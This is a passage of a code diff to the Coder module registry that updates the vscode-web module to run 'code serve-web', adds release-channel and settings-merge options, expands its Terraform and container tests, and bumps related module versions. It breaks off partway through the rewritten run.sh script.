   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "vscode" {
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/coder/modules/vscode-desktop/main.tf

@@ -40,7 +40,7 @@ variable "group" {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 

registry/coder/modules/vscode-web/README.md

@@ -8,13 +8,13 @@ tags: [ide, vscode, web]
 
 # VS Code Web
 
-Automatically install [Visual Studio Code Server](https://code.visualstudio.com/docs/remote/vscode-server) in a workspace and create an app to access it via the dashboard.
+Automatically install the [VS Code CLI](https://code.visualstudio.com/docs/editor/command-line) and run `code serve-web` in a workspace to access VS Code via the browser.
 
 ```tf
 module "vscode-web" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "1.4.3"
+  version        = "2.0.0"
   agent_id       = coder_agent.example.id
   accept_license = true
 }
@@ -30,7 +30,7 @@ module "vscode-web" {
 module "vscode-web" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "1.4.3"
+  version        = "2.0.0"
   agent_id       = coder_agent.example.id
   install_prefix = "/home/coder/.vscode-web"
   folder         = "/home/coder"
@@ -44,22 +44,22 @@ module "vscode-web" {
 module "vscode-web" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "1.4.3"
+  version        = "2.0.0"
   agent_id       = coder_agent.example.id
   extensions     = ["github.copilot", "ms-python.python", "ms-toolsai.jupyter"]
   accept_license = true
 }
 ```
 
-### Pre-configure Settings
+### Pre-configure Machine Settings
 
-Configure VS Code's [settings.json](https://code.visualstudio.com/docs/getstarted/settings#_settings-json-file) file:
+Configure VS Code's [Machine settings.json](https://code.visualstudio.com/docs/getstarted/settings#_settings-json-file). These settings are merged with any existing machine settings on startup:
 
 ```tf
 module "vscode-web" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/vscode-web/coder"
-  version    = "1.4.3"
+  version    = "2.0.0"
   agent_id   = coder_agent.example.id
   extensions = ["dracula-theme.theme-dracula"]
   settings = {
@@ -69,20 +69,7 @@ module "vscode-web" {
 }
 ```
 
-### Pin a specific VS Code Web version
-
-By default, this module installs the latest. To pin a specific version, retrieve the commit ID from the [VS Code Update API](https://update.code.visualstudio.com/api/commits/stable/server-linux-x64-web) and verify its corresponding release on the [VS Code GitHub Releases](https://github.com/microsoft/vscode/releases).
-
-```tf
-module "vscode-web" {
-  count          = data.coder_workspace.me.start_count
-  source         = "registry.coder.com/coder/vscode-web/coder"
-  version        = "1.4.3"
-  agent_id       = coder_agent.example.id
-  commit_id      = "e54c774e0add60467559eb0d1e229c6452cf8447"
-  accept_license = true
-}
-```
+> **Note:** Merging settings requires `jq` or `python3`. If neither is available, existing machine settings will be preserved. User settings configured through the VS Code UI are stored in browser local storage and will not persist across different browsers or devices.
 
 ### Open an existing workspace on startup
 
@@ -91,10 +78,43 @@ Note: Either `workspace` or `folder` can be used, but not both simultaneously. T
 
 ```tf
 module "vscode-web" {
-  count     = data.coder_workspace.me.start_count
-  source    = "registry.coder.com/coder/vscode-web/coder"
-  version   = "1.4.3"
-  agent_id  = coder_agent.example.id
-  workspace = "/home/coder/coder.code-workspace"
+  count          = data.coder_workspace.me.start_count
+  source         = "registry.coder.com/coder/vscode-web/coder"
+  version        = "2.0.0"
+  agent_id       = coder_agent.example.id
+  workspace      = "/home/coder/coder.code-workspace"
+  accept_license = true
 }
 ```
+
+### Use VS Code Insiders
+
+Use the VS Code Insiders release channel to get the latest features and bug fixes:
+
+```tf
+module "vscode-web" {
+  count           = data.coder_workspace.me.start_count
+  source          = "registry.coder.com/coder/vscode-web/coder"
+  version         = "2.0.0"
+  agent_id        = coder_agent.example.id
+  release_channel = "insiders"
+  accept_license  = true
+}
+```
+
+### Pin a specific VS Code version
+
+Use the `commit_id` variable to pin a specific VS Code Server version by its commit SHA:
+
+```tf
+module "vscode-web" {
+  count          = data.coder_workspace.me.start_count
+  source         = "registry.coder.com/coder/vscode-web/coder"
+  version        = "2.0.0"
+  agent_id       = coder_agent.example.id
+  commit_id      = "e54c774e0add60467559eb0d1e229c6452cf8447"
+  accept_license = true
+}
+```
+
+You can find the commit SHA for a specific VS Code version on the [VS Code releases page](https://code.visualstudio.com/updates) or by checking the "About" dialog in VS Code.

registry/coder/modules/vscode-web/main.test.ts

@@ -1,42 +1,793 @@
-import { describe, expect, it } from "bun:test";
-import { runTerraformApply, runTerraformInit } from "~test";
+import {
+  describe,
+  expect,
+  it,
+  beforeAll,
+  afterEach,
+  setDefaultTimeout,
+} from "bun:test";
+import {
+  runTerraformApply,
+  runTerraformInit,
+  runContainer,
+  execContainer,
+  removeContainer,
+  findResourceInstance,
+} from "~test";
+
+// Set timeout to 5 minutes for tests that download VS Code CLI
+setDefaultTimeout(5 * 60 * 1000);
+
+let cleanupContainers: string[] = [];
+
+afterEach(async () => {
+  for (const id of cleanupContainers) {
+    try {
+      await removeContainer(id);
+    } catch {
+      // Ignore cleanup errors
+    }
+  }
+  cleanupContainers = [];
+});
 
 describe("vscode-web", async () => {
-  await runTerraformInit(import.meta.dir);
-
-  it("accept_license should be set to true", () => {
-    const t = async () => {
-      await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: "false",
-      });
-    };
-    expect(t).toThrow("Invalid value for variable");
+  beforeAll(async () => {
+    await runTerraformInit(import.meta.dir);
   });
 
-  it("use_cached and offline can not be used together", () => {
-    const t = async () => {
-      await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        accept_license: "true",
-        use_cached: "true",
-        offline: "true",
-      });
-    };
-    expect(t).toThrow("Offline and Use Cached can not be used together");
+  describe("terraform validation", () => {
+    it("accept_license should be set to true", async () => {
+      try {
+        await runTerraformApply(import.meta.dir, {
+          agent_id: "foo",
+          accept_license: false,
+        });
+        throw new Error("Expected terraform apply to fail");
+      } catch (ex) {
+        expect((ex as Error).message).toContain("Invalid value for variable");
+      }
+    });
+
+    it("use_cached and offline can not be used together", async () => {
+      try {
+        await runTerraformApply(import.meta.dir, {
+          agent_id: "foo",
+          accept_license: true,
+          use_cached: true,
+          offline: true,
+        });
+        throw new Error("Expected terraform apply to fail");
+      } catch (ex) {
+        expect((ex as Error).message).toContain(
+          "Offline and Use Cached can not be used together",
+        );
+      }
+    });
+
+    it("offline and extensions can not be used together", async () => {
+      try {
+        await runTerraformApply(import.meta.dir, {
+          agent_id: "foo",
+          accept_license: true,
+          offline: true,
+          extensions: '["ms-python.python"]',
+        });
+        throw new Error("Expected terraform apply to fail");
+      } catch (ex) {
+        expect((ex as Error).message).toContain(
+          "Offline mode does not allow extensions to be installed",
+        );
+      }
+    });
+
+    it("workspace and folder can not be used together", async () => {
+      try {
+        await runTerraformApply(import.meta.dir, {
+          agent_id: "foo",
+          accept_license: true,
+          folder: "/home/coder",
+          workspace: "/home/coder/test.code-workspace",
+        });
+        throw new Error("Expected terraform apply to fail");
+      } catch (ex) {
+        expect((ex as Error).message).toContain(
+          "Set only one of `workspace` or `folder`",
+        );
+      }
+    });
   });
 
-  it("offline and extensions can not be used together", () => {
-    const t = async () => {
-      await runTerraformApply(import.meta.dir, {
+  describe("script generation", () => {
+    it("generates script with correct port", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
         agent_id: "foo",
-        accept_license: "true",
-        offline: "true",
-        extensions: '["1", "2"]',
+        accept_license: true,
+        port: 8080,
       });
-    };
-    expect(t).toThrow("Offline mode does not allow extensions to be installed");
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("--port 8080");
+    });
+
+    it("generates script with extensions directory", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        extensions_dir: "/custom/extensions",
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("--extensions-dir=/custom/extensions");
+    });
+
+    it("generates script with telemetry level", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        telemetry_level: "off",
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("--telemetry-level off");
+    });
+
+    it("generates script with disable trust", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        disable_trust: true,
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("--disable-workspace-trust");
+    });
+
+    it("generates script with serve-web command", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("serve-web");
+      expect(script.script).toContain("--accept-server-license-terms");
+      expect(script.script).toContain("--without-connection-token");
+    });
+
+    it("generates script with stable release channel by default", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("build=stable");
+    });
+
+    it("generates script with insiders release channel", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        release_channel: "insiders",
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain("build=insiders");
+    });
+
+    it("generates script without commit-id value when not specified", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+      });
+      const script = findResourceInstance(state, "coder_script");
+      // The if condition should have an empty string, so no commit-id value is passed
+      expect(script.script).toContain('if [ -n "" ]; then');
+      // Should not contain any actual commit hash
+      expect(script.script).not.toMatch(/--commit-id [a-f0-9]{40}/);
+    });
+
+    it("generates script with commit-id when specified", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        commit_id: "e54c774e0add60467559eb0d1e229c6452cf8447",
+      });
+      const script = findResourceInstance(state, "coder_script");
+      expect(script.script).toContain(
+        "--commit-id e54c774e0add60467559eb0d1e229c6452cf8447",
+      );
+    });
   });
 
-  // More tests depend on shebang refactors
+  describe("container integration tests", () => {
+    it("uses existing code CLI in PATH", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI that logs when serve-web is called
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+if [ "\$1" = "serve-web" ]; then
+  echo "MOCK_SERVER_STARTED with args: \$@"
+  exit 0
+fi
+echo "code mock called: \$@"
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      // Run the script - the mock will capture the serve-web call
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Found VS Code CLI");
+    });
+
+    it("offline mode fails when CLI not present", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        offline: true,
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(1);
+      expect(result.stdout).toContain(
+        "Offline mode enabled but no VS Code CLI, code-server, or cached VS Code Server found",
+      );
+    });
+
+    it("offline mode uses code-server as fallback", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        offline: true,
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Install mock code-server in PATH
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code-server << 'MOCKEOF'
+#!/bin/bash
+echo "MOCK_CODE_SERVER_STARTED with args: $@"
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code-server`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("offline fallback");
+      expect(result.stdout).toContain("Starting code-server");
+    });
+
+    it("offline mode works with pre-installed CLI", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        offline: true,
+        install_prefix: "/tmp/vscode-web",
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Pre-install mock code CLI at expected location
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /tmp/vscode-web/bin && cat > /tmp/vscode-web/bin/code << 'MOCKEOF'
+#!/bin/bash
+if [ "\$1" = "serve-web" ]; then
+  echo "MOCK_OFFLINE_SERVER_STARTED"
+  exit 0
+fi
+exit 0
+MOCKEOF
+chmod +x /tmp/vscode-web/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Using cached VS Code CLI");
+      expect(result.stdout).toContain("Starting VS Code Web");
+    });
+
+    it("use_cached mode works with pre-installed CLI", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        use_cached: true,
+        install_prefix: "/tmp/vscode-web",
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Pre-install mock code CLI
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /tmp/vscode-web/bin && cat > /tmp/vscode-web/bin/code << 'MOCKEOF'
+#!/bin/bash
+if [ "\$1" = "serve-web" ]; then
+  echo "MOCK_CACHED_SERVER_STARTED"
+  exit 0
+fi
+exit 0
+MOCKEOF
+chmod +x /tmp/vscode-web/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Using cached VS Code CLI");
+    });
+
+    it("creates settings file with correct content", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        settings: '{"editor.fontSize": 14}',
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      await execContainer(containerId, ["bash", "-c", script.script]);
+
+      // Check that settings file was created
+      const settingsResult = await execContainer(containerId, [
+        "cat",
+        "/root/.vscode-server/data/Machine/settings.json",
+      ]);
+
+      expect(settingsResult.exitCode).toBe(0);
+      expect(settingsResult.stdout).toContain("editor.fontSize");
+      expect(settingsResult.stdout).toContain("14");
+    });
+
+    it("creates settings file with multiple settings", async () => {
+      const settings = {
+        "editor.fontSize": 16,
+        "editor.tabSize": 2,
+        "workbench.colorTheme": "Dracula",
+        "editor.formatOnSave": true,
+      };
+
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        settings: JSON.stringify(settings),
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      await execContainer(containerId, ["bash", "-c", script.script]);
+
+      // Check that settings file was created with all settings
+      const settingsResult = await execContainer(containerId, [
+        "cat",
+        "/root/.vscode-server/data/Machine/settings.json",
+      ]);
+
+      expect(settingsResult.exitCode).toBe(0);
+      expect(settingsResult.stdout).toContain("editor.fontSize");
+      expect(settingsResult.stdout).toContain("16");
+      expect(settingsResult.stdout).toContain("editor.tabSize");
+      expect(settingsResult.stdout).toContain("2");
+      expect(settingsResult.stdout).toContain("workbench.colorTheme");
+      expect(settingsResult.stdout).toContain("Dracula");
+      expect(settingsResult.stdout).toContain("editor.formatOnSave");
+      expect(settingsResult.stdout).toContain("true");
+    });
+
+    it("creates settings file in correct directory structure", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        settings: '{"test.setting": "value"}',
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      await execContainer(containerId, ["bash", "-c", script.script]);
+
+      // Verify directory structure was created
+      const dirResult = await execContainer(containerId, [
+        "ls",
+        "-la",
+        "/root/.vscode-server/data/Machine/",
+      ]);
+
+      expect(dirResult.exitCode).toBe(0);
+      expect(dirResult.stdout).toContain("settings.json");
+
+      // Verify parent directories exist
+      const parentDirResult = await execContainer(containerId, [
+        "ls",
+        "-la",
+        "/root/.vscode-server/data/",
+      ]);
+
+      expect(parentDirResult.exitCode).toBe(0);
+      expect(parentDirResult.stdout).toContain("Machine");
+    });
+
+    it("merges settings with existing settings file", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        settings: '{"new.setting": "new_value"}',
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Install jq and create mock code CLI
+      await execContainer(containerId, ["apt-get", "update", "-qq"]);
+      await execContainer(containerId, [
+        "apt-get",
+        "install",
+        "-y",
+        "-qq",
+        "jq",
+      ]);
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      // Pre-create an existing settings file
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /root/.vscode-server/data/Machine && echo '{"existing.setting": "existing_value"}' > /root/.vscode-server/data/Machine/settings.json`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      await execContainer(containerId, ["bash", "-c", script.script]);
+
+      // Check that settings were merged (both existing and new should be present)
+      const settingsResult = await execContainer(containerId, [
+        "cat",
+        "/root/.vscode-server/data/Machine/settings.json",
+      ]);
+
+      expect(settingsResult.exitCode).toBe(0);
+      // Should contain both existing and new settings
+      expect(settingsResult.stdout).toContain("existing.setting");
+      expect(settingsResult.stdout).toContain("existing_value");
+      expect(settingsResult.stdout).toContain("new.setting");
+      expect(settingsResult.stdout).toContain("new_value");
+    });
+
+    it("creates valid JSON settings file", async () => {
+      const settings = {
+        "editor.fontSize": 14,
+        "editor.wordWrap": "on",
+        "files.autoSave": "afterDelay",
+        "files.autoSaveDelay": 1000,
+      };
+
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        settings: JSON.stringify(settings),
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Install jq and create mock code CLI
+      await execContainer(containerId, ["apt-get", "update", "-qq"]);
+      await execContainer(containerId, [
+        "apt-get",
+        "install",
+        "-y",
+        "-qq",
+        "jq",
+      ]);
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      await execContainer(containerId, ["bash", "-c", script.script]);
+
+      // Validate JSON using jq
+      const jsonValidResult = await execContainer(containerId, [
+        "bash",
+        "-c",
+        "jq '.' /root/.vscode-server/data/Machine/settings.json",
+      ]);
+
+      expect(jsonValidResult.exitCode).toBe(0);
+
+      // Extract specific values using jq
+      const fontSizeResult = await execContainer(containerId, [
+        "bash",
+        "-c",
+        "jq '.\"editor.fontSize\"' /root/.vscode-server/data/Machine/settings.json",
+      ]);
+      expect(fontSizeResult.stdout.trim()).toBe("14");
+
+      const wordWrapResult = await execContainer(containerId, [
+        "bash",
+        "-c",
+        "jq '.\"editor.wordWrap\"' /root/.vscode-server/data/Machine/settings.json",
+      ]);
+      expect(wordWrapResult.stdout.trim()).toBe('"on"');
+
+      const autoSaveDelayResult = await execContainer(containerId, [
+        "bash",
+        "-c",
+        "jq '.\"files.autoSaveDelay\"' /root/.vscode-server/data/Machine/settings.json",
+      ]);
+      expect(autoSaveDelayResult.stdout.trim()).toBe("1000");
+    });
+
+    it("installs extensions", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        extensions: '["ms-python.python", "golang.go"]',
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI that logs extension installs
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+if [ "\$1" = "--install-extension" ]; then
+  echo "MOCK_EXTENSION_INSTALL: \$2"
+fi
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Installing extension");
+      expect(result.stdout).toContain("ms-python.python");
+      expect(result.stdout).toContain("golang.go");
+    });
+
+    it("runs with correct server arguments", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        port: 9999,
+        telemetry_level: "off",
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI that captures all arguments
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+echo "MOCK_CODE_ARGS: \$@"
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      const result = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      // Check the output contains expected port message
+      expect(result.stdout).toContain("Starting VS Code Web on port 9999");
+    });
+
+    it("passes commit-id to code CLI when specified", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        commit_id: "abc123def456",
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Create a mock code CLI that logs arguments to the log file (where output is redirected)
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `mkdir -p /usr/local/bin && cat > /usr/local/bin/code << 'MOCKEOF'
+#!/bin/bash
+echo "MOCK_CODE_ARGS: $@"
+exit 0
+MOCKEOF
+chmod +x /usr/local/bin/code`,
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      await execContainer(containerId, ["bash", "-c", script.script]);
+
+      // Wait briefly for background process to write to log
+      await new Promise((resolve) => setTimeout(resolve, 500));
+
+      // Check the log file for the arguments (code CLI output goes there)
+      const logResult = await execContainer(containerId, [
+        "cat",
+        "/tmp/vscode-web.log",
+      ]);
+
+      expect(logResult.exitCode).toBe(0);
+      expect(logResult.stdout).toContain("--commit-id abc123def456");
+    });
+
+    // This test downloads and starts the real VS Code server
+    it("starts real VS Code CLI and responds to healthcheck (requires network)", async () => {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        accept_license: true,
+        port: 13338,
+        install_prefix: "/tmp/vscode-web",
+      });
+
+      const containerId = await runContainer("ubuntu:22.04");
+      cleanupContainers.push(containerId);
+
+      // Install curl for downloading CLI and healthcheck
+      await execContainer(containerId, ["apt-get", "update", "-qq"]);
+      await execContainer(containerId, [
+        "apt-get",
+        "install",
+        "-y",
+        "-qq",
+        "curl",
+      ]);
+
+      const script = findResourceInstance(state, "coder_script");
+
+      // Run the script - it will start the server in background
+      const startResult = await execContainer(containerId, [
+        "bash",
+        "-c",
+        script.script,
+      ]);
+
+      expect(startResult.exitCode).toBe(0);
+      expect(startResult.stdout).toContain("Starting VS Code Web");
+
+      // Wait for server to start and check healthcheck
+      await new Promise((resolve) => setTimeout(resolve, 10000));
+
+      const healthResult = await execContainer(containerId, [
+        "curl",
+        "-s",
+        "-o",
+        "/dev/null",
+        "-w",
+        "%{http_code}",
+        "http://127.0.0.1:13338/healthz",
+      ]);
+
+      // Server should respond (200, 202, or 404 is acceptable - means server is running)
+      expect(["200", "202", "404"]).toContain(healthResult.stdout.trim());
+    });
+  });
 });

registry/coder/modules/vscode-web/main.tf

@@ -59,12 +59,6 @@ variable "install_prefix" {
   default     = "/tmp/vscode-web"
 }
 
-variable "commit_id" {
-  type        = string
-  description = "Specify the commit ID of the VS Code Web binary to pin to a specific version. If left empty, the latest stable version is used."
-  default     = ""
-}
-
 variable "extensions" {
   type        = list(string)
   description = "A list of extensions to install."
@@ -105,7 +99,7 @@ variable "group" {
 
 variable "settings" {
   type        = any
-  description = "A map of settings to apply to VS Code web."
+  description = "A map of settings to apply to VS Code Web's Machine settings. These settings are merged with any existing machine settings on startup."
   default     = {}
 }
 
@@ -148,25 +142,35 @@ variable "subdomain" {
   default     = true
 }
 
-variable "platform" {
-  type        = string
-  description = "The platform to use for the VS Code Web."
-  default     = ""
-  validation {
-    condition     = var.platform == "" || var.platform == "linux" || var.platform == "darwin" || var.platform == "alpine" || var.platform == "win32"
-    error_message = "Incorrect value. Please set either 'linux', 'darwin', or 'alpine' or 'win32'."
-  }
-}
-
 variable "workspace" {
   type        = string
   description = "Path to a .code-workspace file to open in vscode-web."
   default     = ""
 }
 
+variable "release_channel" {
+  type        = string
+  description = "The release channel for VS Code CLI (stable or insiders)."
+  default     = "stable"
+  validation {
+    condition     = var.release_channel == "stable" || var.release_channel == "insiders"
+    error_message = "Incorrect value. Please set either 'stable' or 'insiders'."
+  }
+}
+
+variable "commit_id" {
+  type        = string
+  description = "The commit SHA to use for the VS Code Server. Leave empty to use the latest version."
+  default     = ""
+}
+
 data "coder_workspace_owner" "me" {}
 data "coder_workspace" "me" {}
 
+locals {
+  settings_b64 = var.settings != {} ? base64encode(jsonencode(var.settings)) : ""
+}
+
 resource "coder_script" "vscode-web" {
   agent_id     = var.agent_id
   display_name = "VS Code Web"
@@ -177,8 +181,7 @@ resource "coder_script" "vscode-web" {
     INSTALL_PREFIX : var.install_prefix,
     EXTENSIONS : join(",", var.extensions),
     TELEMETRY_LEVEL : var.telemetry_level,
-    // This is necessary otherwise the quotes are stripped!
-    SETTINGS : replace(jsonencode(var.settings), "\"", "\\\""),
+    SETTINGS_B64 : local.settings_b64,
     OFFLINE : var.offline,
     USE_CACHED : var.use_cached,
     DISABLE_TRUST : var.disable_trust,
@@ -187,8 +190,8 @@ resource "coder_script" "vscode-web" {
     WORKSPACE : var.workspace,
     AUTO_INSTALL_EXTENSIONS : var.auto_install_extensions,
     SERVER_BASE_PATH : local.server_base_path,
+    RELEASE_CHANNEL : var.release_channel,
     COMMIT_ID : var.commit_id,
-    PLATFORM : var.platform,
   })
   run_on_start = true
 

registry/coder/modules/vscode-web/run.sh

@@ -1,138 +1,417 @@
 #!/usr/bin/env bash
 
 BOLD='\033[0;1m'
+RESET='\033[0m'
+CODE='\033[36;40;1m'
 EXTENSIONS=("${EXTENSIONS}")
-VSCODE_WEB="${INSTALL_PREFIX}/bin/code-server"
 
-# Set extension directory
+# Merge settings from module with existing settings file
+# Uses jq if available, falls back to Python3 for deep merge
+merge_settings() {
+  local new_settings="$1"
+  local settings_file="$2"
+
+  if [ -z "$new_settings" ] || [ "$new_settings" = "{}" ]; then
+    return 0
+  fi
+
+  if [ ! -f "$settings_file" ]; then
+    mkdir -p "$(dirname "$settings_file")"
+    printf '%s\n' "$new_settings" > "$settings_file"
+    printf "Creating settings file...\n"
+    return 0
+  fi
+
+  local tmpfile
+  tmpfile="$(mktemp)"
+
+  if command -v jq > /dev/null 2>&1; then
+    if jq -s '.[0] * .[1]' "$settings_file" <(printf '%s\n' "$new_settings") > "$tmpfile" 2> /dev/null; then
+      mv "$tmpfile" "$settings_file"
+      printf "Merging settings...\n"
+      return 0
+    fi
+  fi
+
+  if command -v python3 > /dev/null 2>&1; then
